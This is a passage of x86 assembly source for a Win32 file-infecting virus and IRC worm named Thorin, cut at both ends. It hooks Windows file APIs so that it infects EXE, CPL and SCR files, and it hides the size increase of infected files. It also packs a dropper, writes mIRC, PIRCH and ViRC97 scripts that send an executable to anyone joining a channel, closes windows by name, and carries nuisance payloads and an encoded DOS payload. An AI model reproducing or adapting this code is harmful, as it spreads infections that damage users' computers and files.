apicall _CloseHandle
|
|||
|
ret
|
|||
|
payload1 endp
|
|||
|
|
|||
|
payload2 proc
|
|||
|
call __
|
|||
|
db "THORIN",0 ; HD Name is... THORIN :)
|
|||
|
__: push 00000000h
|
|||
|
apicall _SetVolumeLabelA
|
|||
|
ret
|
|||
|
payload2 endp
|
|||
|
|
|||
|
payload3 proc
|
|||
|
push 00000001h
|
|||
|
apicall _SwapMouseButton ; Left is right, right is left
|
|||
|
ret
|
|||
|
payload3 endp
|
|||
|
|
|||
|
payload4 proc
|
|||
|
push 00001010h ; Display message
|
|||
|
lea eax,[ebp+vname]
|
|||
|
push eax
|
|||
|
call _2
|
|||
|
|
|||
|
; Stupid message to annoy user... panic ain't good, but... what is good? ;)
|
|||
|
|
|||
|
db "Thorin... Thorin... Thorin... Thorin... Thorin...",13,13
|
|||
|
db "I am Thorin, son of Thrain, son of Thror",13
|
|||
|
db "and your computer is mine... mwahahahahaha!",13
|
|||
|
db "I will give you... the death you deserve!",13,13
|
|||
|
db "...Thorin ...Thorin ...Thorin ...Thorin ...Thorin",0
|
|||
|
|
|||
|
_2: push 00000000h
|
|||
|
apicall _MessageBoxA
|
|||
|
payload4 endp
|
|||
|
|
|||
|
payload5 proc
|
|||
|
lea ebx,[ebp+szSHELL32]
|
|||
|
push ebx
|
|||
|
apicall _LoadLibraryA ; Get SHELL32 base address
|
|||
|
lea ecx,[ebp+@ShellExecuteA]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
apicall _GetProcAddress ; Get ShellExecuteA address
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
lea ecx,[ebp+szMicro$oft]
|
|||
|
push ecx
|
|||
|
lea ecx,[ebp+szOPEN]
|
|||
|
push ecx
|
|||
|
push ebx
|
|||
|
call eax ; Open Micro$oft web
|
|||
|
ret
|
|||
|
payload5 endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Some miscellaneous functions
|
|||
|
; ===========================================================================
|
|||
|
; ALIGN
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Number to align
|
|||
|
; ECX = Alignment factor
|
|||
|
; output:
|
|||
|
; EAX = Aligned number
|
|||
|
;
|
|||
|
|
|||
|
Align proc
|
|||
|
push edx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
Align endp
|
|||
|
|
|||
|
; TRUNCFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Where trunc file
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
TruncFile proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetFilePointer
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetEndOfFile
|
|||
|
ret
|
|||
|
TruncFile endp
|
|||
|
|
|||
|
; OPENFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / -1 (if failed)
|
|||
|
;
|
|||
|
|
|||
|
OpenFile proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h or 80000000h
|
|||
|
push esi
|
|||
|
apicall _CreateFileA
|
|||
|
ret
|
|||
|
OpenFile endp
|
|||
|
|
|||
|
; CREATEMAP
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size to map
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / 0 (if failed)
|
|||
|
;
|
|||
|
|
|||
|
CreateMap proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push 00000004h
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _CreateFileMappingA
|
|||
|
ret
|
|||
|
CreateMap endp
|
|||
|
|
|||
|
; MAPFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size to map
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / 0 (if failed)
|
|||
|
|
|||
|
MapFile proc
|
|||
|
xor eax,eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 000F001Fh
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _MapViewOfFile
|
|||
|
ret
|
|||
|
MapFile endp
|
|||
|
|
|||
|
; REGEXIST
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it exist, to 0 if it doesn't
|
|||
|
;
|
|||
|
|
|||
|
RegExist proc
|
|||
|
lea eax,[ebp+RegHandle]
|
|||
|
push eax
|
|||
|
push 000F003Fh
|
|||
|
push 00000000h
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegOpenKeyExA
|
|||
|
cmp eax,2
|
|||
|
jz RegExistExitCF0
|
|||
|
push dword ptr [ebp+RegHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
stc
|
|||
|
ret
|
|||
|
RegExistExitCF0:
|
|||
|
clc
|
|||
|
ret
|
|||
|
RegExist endp
|
|||
|
|
|||
|
; PUTREG
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
PutReg proc
|
|||
|
lea eax,[ebp+Disposition]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+RegHandle]
|
|||
|
push eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push 000F003Fh
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegCreateKeyExA
|
|||
|
push dword ptr [ebp+RegHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
PutReg endp
|
|||
|
|
|||
|
; DELREG
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
DelReg proc
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegDeleteKeyA
|
|||
|
ret
|
|||
|
DelReg endp
|
|||
|
|
|||
|
; TERMINATEPROC
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to the name of the window of the process we wanna kill
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it wasn't found or killed, to 0 if it was killed
|
|||
|
;
|
|||
|
|
|||
|
TerminateProc proc
|
|||
|
xor ebx,ebx ; Thnx 2 Bennyg0d :)
|
|||
|
push edi
|
|||
|
push ebx
|
|||
|
apicall _FindWindowA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz TP_ErrorExit
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push 00000012h
|
|||
|
push ecx
|
|||
|
apicall _PostMessageA
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
TP_ErrorExit:
|
|||
|
stc
|
|||
|
ret
|
|||
|
TerminateProc endp
|
|||
|
|
|||
|
; GETLASTSECTION
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to PE header
|
|||
|
; output:
|
|||
|
; ESI = Pointer to last section
|
|||
|
; EDI = Pointer to PE header
|
|||
|
;
|
|||
|
|
|||
|
GetLastSection proc
|
|||
|
mov edi,esi
|
|||
|
movzx eax,word ptr [edi+06h] ; Get ptr to last section
|
|||
|
dec eax
|
|||
|
imul eax,eax,28h ; C'mon, feel the noise...
|
|||
|
add esi,eax
|
|||
|
add esi,78h
|
|||
|
mov edx,[edi+74h]
|
|||
|
shl edx,03h
|
|||
|
add esi,edx
|
|||
|
ret
|
|||
|
GetLastSection endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Get Delta Offset
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; ECX = Delta Offset
|
|||
|
;
|
|||
|
|
|||
|
GetDeltaOffset proc
|
|||
|
call getitright ; Oh! What is this? Incredible!
|
|||
|
getitright:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset getitright
|
|||
|
ret
|
|||
|
GetDeltaOffset endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Dropper unpacker (25 bytes) <<->> [LSCE] - Little Shitty Compression Engine
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; ??? ??????? ??????? ???????
|
|||
|
; ? ? ? ????? ? ????? ? ????? The Little and Shitty Compression Engine
|
|||
|
; ? ????? ????? ? ? ????? ? ????? Poorly coded and written by...
|
|||
|
; ??????? ??????? ??????? ??????? Who cares? :) Well... by me. Any problem?
|
|||
|
;
|
|||
|
; This is a very simple packing engine, based in the repetition of zeros that
|
|||
|
; the PE files have, thus it is able to compress a PE file... Hehehe, i can
|
|||
|
; put a dropper without caring about its space! That was the only reason of
|
|||
|
; make this little shit. Maybe one day i will make a 'real' compression engi-
|
|||
|
; ne, but today i'm too busy :)
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Offset where unpack
|
|||
|
; ESI = Data to unpack
|
|||
|
; ECX = Size of packed data
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
LSCE_UnPack proc
|
|||
|
xor eax,eax ; 2 bytes Hehehe, i
|
|||
|
process_byte: ; think i'm
|
|||
|
lodsb ; 1 byte turning a
|
|||
|
or al,al ; 2 bytes little bit
|
|||
|
jnz store_byte ; 2 bytes paranoid...
|
|||
|
dec ecx ; 1 byte
|
|||
|
dec ecx ; 1 byte
|
|||
|
lodsw ; 2 bytes
|
|||
|
push ecx ; 1 byte
|
|||
|
xor ecx,ecx ; 2 bytes
|
|||
|
xchg eax,ecx ; 1 byte
|
|||
|
rep stosb ; 2 bytes
|
|||
|
pop ecx ; 1 byte
|
|||
|
loop process_byte ; 2 bytes
|
|||
|
jecxz all_unpacked ; 2 bytes
|
|||
|
store_byte:
|
|||
|
stosb ; 1 byte
|
|||
|
loop process_byte ; 2 bytes
|
|||
|
all_unpacked:
|
|||
|
ret ; 2 bytes
|
|||
|
LSCE_UnPack endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hook all the possible APIs, of host IT
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
HookAllAPIs:
|
|||
|
mov eax,dword ptr [ebp+ModBase] ; file modbase=file imagebase
|
|||
|
mov dword ptr [ebp+imagebase],eax
|
|||
|
|
|||
|
lea edi,[ebp+@@Hookz] ; Ptr to the first API
|
|||
|
nxtapi: push edi
|
|||
|
call GetAPI_IT ; Get it from Import Table
|
|||
|
pop edi
|
|||
|
jc Next_IT_Struc_ ; Fail? Damn...
|
|||
|
|
|||
|
xor al,al ; Reach the end of API string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
mov eax,[edi] ; All must be in its place :)
|
|||
|
add eax,ebp
|
|||
|
mov [ebx],eax
|
|||
|
Next_IT_Struc:
|
|||
|
add edi,4
|
|||
|
cmp byte ptr [edi],"" ; Reach the last api? Grrr...
|
|||
|
jz AllHooked
|
|||
|
jmp nxtapi
|
|||
|
AllHooked:
|
|||
|
ret
|
|||
|
|
|||
|
Next_IT_Struc_:
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
jmp Next_IT_Struc
|
|||
|
|
|||
|
; A bard was our savior!
|
|||
|
|
|||
|
db 0,"[Glory to the Bards!]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hooks' code
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
HookMoveFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_MoveFileA]
|
|||
|
|
|||
|
HookCopyFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CopyFileA]
|
|||
|
|
|||
|
HookGetFullPathNameA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_GetFullPathNameA]
|
|||
|
|
|||
|
HookDeleteFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_DeleteFileA]
|
|||
|
|
|||
|
HookWinExec:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_WinExec]
|
|||
|
|
|||
|
HookCreateFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CreateFileA]
|
|||
|
|
|||
|
HookCreateProcessA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CreateProcessA]
|
|||
|
|
|||
|
HookGetFileAttributesA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_GetFileAttributesA]
|
|||
|
|
|||
|
HookFindFirstFileA:
|
|||
|
pushad ; Save all reggies
|
|||
|
call GetDeltaOffset ; EBP = Delta Offset
|
|||
|
mov eax,[esp+20h] ; EAX = Return Address
|
|||
|
mov dword ptr [ebp+FFRetAddress],eax
|
|||
|
mov eax,[esp+28h] ; EAX = Ptr to WFD
|
|||
|
mov dword ptr [ebp+FF_WFD],eax
|
|||
|
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
add esp,4 ; Remove this ret address from
|
|||
|
; stack
|
|||
|
|
|||
|
call [eax+_FindFirstFileA] ; Call original API
|
|||
|
|
|||
|
test eax,eax ; Fail? Shit...
|
|||
|
jz FF_GoAway
|
|||
|
|
|||
|
pushad ; Save reggies and flaggies
|
|||
|
pushfd
|
|||
|
|
|||
|
call GetDeltaOffset ; Delta again
|
|||
|
|
|||
|
movzx ebx,byte ptr [ebp+WFD_Handles_Count] ; Number of active hndlers
|
|||
|
mov edx,[ebp+WFD_HndInMem] ; Our Handle table in mem
|
|||
|
|
|||
|
mov esi,12345678h ; Ptr to filename
|
|||
|
FF_WFD equ $-4
|
|||
|
add esi,(offset WFD_szFileName-offset WIN32_FIND_DATA)
|
|||
|
|
|||
|
cmp ebx,n_Handles ; Over max hnd storing?
|
|||
|
jae AvoidStoring ; Shit...
|
|||
|
|
|||
|
; WFD_Handles structure
|
|||
|
; ?????????????????????
|
|||
|
; +00h WFD Handle
|
|||
|
; +04h Address of its WIN32_FIND_DATA
|
|||
|
|
|||
|
mov dword ptr [edx+ebx*8],eax ; Store Handle
|
|||
|
mov dword ptr [edx+ebx*8+4],esi ; Store WFD offset
|
|||
|
|
|||
|
inc byte ptr [ebp+WFD_Handles_Count]
|
|||
|
|
|||
|
AvoidStoring:
|
|||
|
push esi
|
|||
|
call Check4ValidFile ; Is a reliable file 4 inf?
|
|||
|
pop edi
|
|||
|
jc FF_AvoidInfekt ; Duh!
|
|||
|
|
|||
|
push edi
|
|||
|
call _Infection ; Infect it
|
|||
|
pop esi
|
|||
|
|
|||
|
call Info4Stealth ; Get, if available, old file's
|
|||
|
; size
|
|||
|
jc FF_AvoidInfekt
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+FF_WFD]
|
|||
|
add ecx,(offset WFD_nFileSizeLow-offset WIN32_FIND_DATA)
|
|||
|
mov [ecx],eax ; Size stealth!
|
|||
|
|
|||
|
FF_AvoidInfekt:
|
|||
|
popfd
|
|||
|
popad
|
|||
|
|
|||
|
FF_GoAway: ; Return to caller
|
|||
|
push 12345678h
|
|||
|
FFRetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
HookFindNextFileA:
|
|||
|
pushad ; Save all reggies
|
|||
|
call GetDeltaOffset ; Get delta offset
|
|||
|
mov eax,[esp+20h] ; EAX = Return address
|
|||
|
mov dword ptr [ebp+FNRetAddress],eax
|
|||
|
mov eax,[esp+24h] ; EAX = Search Handle
|
|||
|
mov dword ptr [ebp+FN_Hnd],eax
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
|
|||
|
add esp,4
|
|||
|
|
|||
|
call [eax+_FindNextFileA] ; Call original API
|
|||
|
or eax,eax ; Fail? Damn.
|
|||
|
jz FN_GoAway
|
|||
|
|
|||
|
pushad ; Save regs and flags
|
|||
|
pushfd
|
|||
|
|
|||
|
call GetDeltaOffset ; Get delta again
|
|||
|
|
|||
|
mov eax,12345678h ; EAX = Search Handle
|
|||
|
FN_Hnd equ $-4
|
|||
|
|
|||
|
call Check4ValidHandle ; Is in our table? If yes,
|
|||
|
jc FN_AvoidInfekt ; infect.
|
|||
|
|
|||
|
xchg esi,eax ; ESI = Pointer to WFD
|
|||
|
|
|||
|
mov dword ptr [ebp+FN_FS],esi ; Save if for later
|
|||
|
add esi,(offset WFD_szFileName-offset WIN32_FIND_DATA)
|
|||
|
push esi ; ESI = Ptr to filename
|
|||
|
call Check4ValidFile ; Is reliable its inf.?
|
|||
|
pop edi
|
|||
|
jc FN_AvoidInfekt ; Duh...
|
|||
|
push edi
|
|||
|
call _Infection ; Infect it !
|
|||
|
pop esi
|
|||
|
call Info4Stealth ; Retrieve info for possible
|
|||
|
; stealth...
|
|||
|
jc FN_AvoidInfekt
|
|||
|
|
|||
|
mov ecx,12345678h
|
|||
|
FN_FS equ $-4
|
|||
|
add ecx,(offset WFD_nFileSizeLow-offset WIN32_FIND_DATA)
|
|||
|
mov [ecx],eax ; Size Stealth, dude!
|
|||
|
|
|||
|
FN_AvoidInfekt:
|
|||
|
popfd ; Restore flags & regs
|
|||
|
popad
|
|||
|
|
|||
|
FN_GoAway: ; Return to caller
|
|||
|
push 12345678h
|
|||
|
FNRetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
HookGetProcAddress:
|
|||
|
pushad ; Save all the registers
|
|||
|
call GetDeltaOffset ; EBP = Delta Offset
|
|||
|
mov eax,[esp+24h] ; EAX = Base address of module
|
|||
|
cmp eax,dword ptr [ebp+kernel] ; Is EAX=K32?
|
|||
|
jnz OriginalGPA ; If not, it's not our problem
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
pop dword ptr [eax+HGPA_RetAddress] ; Put ret address in a safe place
|
|||
|
|
|||
|
call [eax+_GetProcAddress] ; Call original API
|
|||
|
or eax,eax ; Fail? Duh!
|
|||
|
jz HGPA_SeeYa
|
|||
|
|
|||
|
pushad
|
|||
|
xchg eax,ebx ; EBX = Address of function
|
|||
|
|
|||
|
call GetDeltaOffset ; EBP = Delta offset
|
|||
|
|
|||
|
mov ecx,n_HookedAPIs ; ECX = Number of hooked apis
|
|||
|
lea esi,[ebp+@@HookedOffsetz] ; ESI = Ptr to array of API
|
|||
|
; addresses
|
|||
|
xor edx,edx ; EDX = Counter (set to 0)
|
|||
|
HGPA_IsHookableAPI?:
|
|||
|
lodsd ; EAX = API from array
|
|||
|
cmp ebx,eax ; Is equal to requested address?
|
|||
|
jz HGPA_IndeedItIs ; If yes, it's interesting 4 us
|
|||
|
inc edx ; Increase counter
|
|||
|
loop HGPA_IsHookableAPI? ; Search loop
|
|||
|
jmp OriginalGPAx
|
|||
|
|
|||
|
HGPA_IndeedItIs:
|
|||
|
lea edi,[ebp+@@Hookz] ; EDI = Ptr to hooked API strings
|
|||
|
xor ebx,ebx ; EBX = New counter
|
|||
|
HGPA_AndWhatAPI?:
|
|||
|
cmp edx,ebx ; We want EBX = EDX
|
|||
|
jz HGPA_ThisAPI
|
|||
|
xor al,al ; Travel trough the Hooks
|
|||
|
scasb ; structure
|
|||
|
jnz $-1
|
|||
|
add edi,4
|
|||
|
inc ebx
|
|||
|
jmp HGPA_AndWhatAPI?
|
|||
|
HGPA_ThisAPI:
|
|||
|
xor al,al ; EDI = Points to requested
|
|||
|
scasb ; api string
|
|||
|
jnz $-1
|
|||
|
mov eax,[edi] ; Get its offset
|
|||
|
add eax,ebp ; Adjust it to delta
|
|||
|
mov [esp.PUSHAD_EAX],eax
|
|||
|
popad
|
|||
|
|
|||
|
HGPA_SeeYa:
|
|||
|
push 12345678h
|
|||
|
HGPA_RetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
OriginalGPAx:
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
push dword ptr [eax+HGPA_RetAddress]
|
|||
|
jmp [eax+_GetProcAddress]
|
|||
|
|
|||
|
OriginalGPA:
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
jmp [eax+_GetProcAddress]
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hooked "standard" APIs handler
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DoHookStuff:
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
call GetDeltaOffset
|
|||
|
mov edx,[esp+2Ch] ; Get filename to infect
|
|||
|
mov esi,edx
|
|||
|
call Check4ValidFile
|
|||
|
jc ErrorDoHookStuff
|
|||
|
InfectWithHookStuff:
|
|||
|
xchg edi,edx
|
|||
|
call _Infection
|
|||
|
ErrorDoHookStuff:
|
|||
|
popfd ; Preserve all as if nothing
|
|||
|
popad ; happened :)
|
|||
|
push ebp
|
|||
|
call GetDeltaOffset ; Get delta offset
|
|||
|
xchg eax,ebp
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve information for size-stealth
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file name
|
|||
|
; output:
|
|||
|
; EAX = Old Size (Stored at PE Header+44h)
|
|||
|
; CF = Set to 1 if error (file not infected, I/O, etc)
|
|||
|
;
|
|||
|
|
|||
|
Info4Stealth:
|
|||
|
and byte ptr [ebp+CoolFlag],00h ; Flag to 0
|
|||
|
|
|||
|
call OpenFile ; Open File
|
|||
|
cmp_ eax,I4S_Error
|
|||
|
|
|||
|
mov dword ptr [ebp+FileHandle],eax ; Store its handler
|
|||
|
|
|||
|
push 00000000h ; Get file's size
|
|||
|
push eax
|
|||
|
apicall _GetFileSize
|
|||
|
xchg eax,ecx
|
|||
|
|
|||
|
push ecx ; Create its mapping
|
|||
|
call CreateMap
|
|||
|
pop ecx
|
|||
|
|
|||
|
cmpz_ eax,I4S_Error_CloseFileHnd
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax ; Save handler
|
|||
|
|
|||
|
call MapFile ; Create a mapping view
|
|||
|
cmpz_ eax,I4S_Error_CloseMapHnd
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax ; Store mapping address
|
|||
|
|
|||
|
mov esi,[eax+3Ch]
|
|||
|
add esi,eax
|
|||
|
cmp dword ptr [esi],"EP" ; Is it PE?
|
|||
|
jnz I4S_Error_UnMapHnd
|
|||
|
|
|||
|
push dword ptr [esi+orig_size] ; Get original's file size
|
|||
|
pop dword ptr [ebp+OldSize] ; And put it in a temp place
|
|||
|
|
|||
|
inc byte ptr [ebp+CoolFlag] ; Set flag to 1
|
|||
|
|
|||
|
I4S_Error_UnMapHnd:
|
|||
|
push dword ptr [ebp+MapAddress] ; Close map view of file
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
I4S_Error_CloseMapHnd:
|
|||
|
push dword ptr [ebp+MapHandle] ; Close map handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
I4S_Error_CloseFileHnd:
|
|||
|
push dword ptr [ebp+FileHandle] ; Close file handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
cmp byte ptr [ebp+CoolFlag],00h ; Were we able to open? If yes,
|
|||
|
jz I4S_Error ; leave stack clear...
|
|||
|
|
|||
|
I4S_Successful:
|
|||
|
mov eax,12345678h
|
|||
|
OldSize equ $-4
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
I4S_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Check if file infection is reliable
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it's reliable, to 0 if it isn't
|
|||
|
;
|
|||
|
|
|||
|
Check4ValidFile:
|
|||
|
lodsb
|
|||
|
or al,al ; Find NULL? Shit...
|
|||
|
jz C4VF_Error
|
|||
|
cmp al,"." ; Dot found? Interesting...
|
|||
|
jnz Check4ValidFile
|
|||
|
dec esi
|
|||
|
lodsd ; Put extension in EAX
|
|||
|
or eax,20202020h ; Make string locase
|
|||
|
not eax
|
|||
|
cmp eax,not "exe." ; Is it an EXE? Infect!!!
|
|||
|
jz C4VF_Successful
|
|||
|
cmp eax,not "lpc." ; Is it a CPL? Infect!!!
|
|||
|
jz C4VF_Successful
|
|||
|
cmp eax,not "rcs." ; Is is a SCR? Infect!!!
|
|||
|
jnz C4VF_Error
|
|||
|
C4VF_Successful:
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
C4VF_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Check if handle was stored previously
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Handle
|
|||
|
; output:
|
|||
|
; EAX = WFD Offset of given handle
|
|||
|
; EDX = Places what it occupies in WFD_Handles structure
|
|||
|
; CF = Set to 1 if it's found, to 0 if it wasn't
|
|||
|
;
|
|||
|
|
|||
|
Check4ValidHandle:
|
|||
|
xor edx,edx
|
|||
|
mov edi,[ebp+WFD_HndInMem]
|
|||
|
C4VH_l00p:
|
|||
|
cmp edx,n_Handles ; Over limits? Shit...
|
|||
|
jae C4VH_Error
|
|||
|
|
|||
|
cmp eax,[edx*8+edi] ; EAX = a handler stored in
|
|||
|
jz C4VH_Successful ; table
|
|||
|
|
|||
|
inc edx ; Increase counter
|
|||
|
jmp C4VH_l00p
|
|||
|
C4VH_Successful:
|
|||
|
mov eax,[edx*8+edi+4] ; EAX = WFD Offset
|
|||
|
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
C4VH_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; mIRC worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
mIRCWorm db "[script]",10
|
|||
|
db "n0=ON 1:JOIN:#: {/if ($nick==$me) { halt }",10
|
|||
|
db "n1=/dcc send $nick c:\pr0n.exe",10
|
|||
|
db "n2=}",10
|
|||
|
db "n3=ON 1:TEXT:*pr0n*:#:/quit Win32.mIRC32.Thorin 1.00",10
|
|||
|
db "n4=ON 1:TEXT:*virus*:#:/ignore -u666 $nick",10
|
|||
|
db "n5=ON 1:CONNECT: {",10
|
|||
|
db "n6=/msg Billy_Bel You are the g0d of fuck!",10
|
|||
|
db "n7=}",10
|
|||
|
mIRCWormSize equ ($-offset mIRCWorm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PIRCH worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
PirchWorm db "[Levels]",10
|
|||
|
db "Enabled=1",10
|
|||
|
db "Count=1",10
|
|||
|
db "Level1=ThorinWorm",10,10
|
|||
|
db "[ThorinWorm]",10
|
|||
|
db "User1=*!*@*",10
|
|||
|
db "UserCount=1",10
|
|||
|
db "Event1=;Thorin is here",10
|
|||
|
db "Event2=ON JOIN:#:/dcc send $nick c:\pr0n.exe",10
|
|||
|
db "Event3=;Win32.PIRCH32.Thorin 1.00",10
|
|||
|
db "EventCount=3",10
|
|||
|
PirchWormSize equ ($-offset PirchWorm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; ViRC97 worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
ViRC97Worm db "Name Win32.ViRC97.Thorin 1.00",10
|
|||
|
db "// Events",10,10
|
|||
|
db 'Event JOIN "* JOIN"',10
|
|||
|
db " DCC Send $nick c:\pr0n.exe",10
|
|||
|
db "EndEvent",10
|
|||
|
ViRC97WormSize equ ($-offset ViRC97Worm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Payload code
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
payl0ad label byte
|
|||
|
db 0B8h, 003h, 000h, 0CDh, 010h, 0BEh, 051h, 002h
|
|||
|
db 0E8h, 0F7h, 000h, 033h, 0C0h, 0CDh, 016h, 03Ch
|
|||
|
db 063h, 074h, 003h, 0E9h, 0C7h, 000h, 0BEh, 0BCh
|
|||
|
db 003h, 0E8h, 0E6h, 000h, 033h, 0C0h, 0CDh, 016h
|
|||
|
db 03Ch, 061h, 074h, 003h, 0E9h, 0B6h, 000h, 0BEh
|
|||
|
db 005h, 004h, 0E8h, 0D5h, 000h, 033h, 0C0h, 0CDh
|
|||
|
db 016h, 03Ch, 062h, 074h, 003h, 0E9h, 0A5h, 000h
|
|||
|
db 0E8h, 09Bh, 000h, 059h, 06Fh, 075h, 020h, 064h
|
|||
|
db 065h, 06Dh, 06Fh, 06Eh, 073h, 074h, 072h, 061h
|
|||
|
db 074h, 065h, 064h, 02Ch, 020h, 061h, 074h, 020h
|
|||
|
db 06Ch, 065h, 061h, 073h, 074h, 02Ch, 020h, 074h
|
|||
|
db 068h, 061h, 074h, 020h, 079h, 06Fh, 075h, 020h
|
|||
|
db 068h, 061h, 076h, 065h, 020h, 072h, 065h, 061h
|
|||
|
db 064h, 020h, 027h, 054h, 068h, 065h, 020h, 048h
|
|||
|
db 06Fh, 062h, 062h, 069h, 074h, 027h, 02Eh, 02Eh
|
|||
|
